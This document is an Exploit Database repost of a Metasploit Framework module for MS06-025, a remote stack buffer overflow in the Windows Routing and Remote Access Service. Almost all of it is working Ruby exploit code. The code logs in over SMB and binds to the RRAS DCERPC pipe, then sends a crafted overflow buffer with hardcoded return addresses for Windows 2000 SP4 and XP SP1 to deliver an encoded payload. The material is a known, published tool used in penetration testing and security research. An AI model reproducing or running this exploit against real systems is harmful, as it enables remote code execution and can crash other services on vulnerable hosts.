Microsoft RRAS Service – Remote Overflow (MS06-025) (Metasploit)

• Exploit Database
• 8 阅读

• 作者： Metasploit
  日期： 2010-05-09
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16364/

• ##
  # $Id: ms06_025_rras.rb 9262 2010-05-09 17:45:00Z jduck $
  ##
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = AverageRanking
  
  	include Msf::Exploit::Remote::DCERPC
  	include Msf::Exploit::Remote::SMB
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'Microsoft RRAS Service Overflow',
  			'Description'=> %q{
  					This module exploits a stack buffer overflow in the Windows Routing and Remote
  				Access Service. Since the service is hosted inside svchost.exe, a failed
  				exploit attempt can cause other system services to fail as well. A valid
  				username and password is required to exploit this flaw on Windows 2000.
  				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.			},
  			'Author' =>
  				[
  					'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
  					'hdm'
  				],
  			'License'=> MSF_LICENSE,
  			'Version'=> '$Revision: 9262 $',
  			'References' =>
  				[
  					[ 'CVE', '2006-2370' ],
  					[ 'OSVDB', '26437' ],
  					[ 'BID', '18325' ],
  					[ 'MSB', 'MS06-025' ]
  				],
  			'DefaultOptions' =>
  				{
  					'EXITFUNC' => 'thread',
  				},
  			'Privileged' => true,
  			'Payload'=>
  				{
  					'Space'=> 1104,
  					'BadChars' => "\x00",
  					'StackAdjustment' => -3500,
  				},
  			'Platform' => 'win',
  			'Targets'=>
  				[
  					[ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
  					[ 'Windows XP SP1', { 'Ret' => 0x7248d4cc } ],
  				],
  
  			'DisclosureDate' => 'Jun 13 2006'))
  
  		register_options(
  			[
  				OptString.new('SMBPIPE', [ true,"The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
  			], self.class)
  	end
  
  	# Post authentication bugs are rarely useful during automation
  	def autofilter
  		false
  	end
  
  	def exploit
  
  		connect()
  		smb_login()
  
  		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
  
  		print_status("Binding to #{handle} ...")
  		dcerpc_bind(handle)
  		print_status("Bound to #{handle} ...")
  
  
  		print_status('Getting OS...')
  
  		# Check the remote OS name and version
  		os = smb_peer_os
  		pat = ''
  
  		case os
  		when /Windows 5\.0/
  			pat =
  				payload.encoded +
  				"\xeb\x06" +
  				rand_text_alphanumeric(2) +
  				[target.ret].pack('V') +
  				"\xe9\xb7\xfb\xff\xff"
  			os = 'Windows 2000'
  		when /Windows 5\.1/
  			pat =
  				rand_text_alphanumeric(0x4c) +
  				"\xeb\x06" +
  				rand_text_alphanumeric(2) +
  				[target.ret].pack('V') +
  				payload.encoded
  			os = 'Windows XP'
  		end
  
  		req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
  		len = req.length
  		stb =
  			NDR.long(0x20000) +
  			NDR.long(len) +
  			req +
  			NDR.long(len)
  
  		print_status("Calling the vulnerable function on #{os}...")
  
  		begin
  			dcerpc.call(0x0C, stb)
  		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
  		rescue => e
  			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
  				raise e
  			end
  		end
  
  		# Cleanup
  		handler
  		disconnect
  	end
  
  end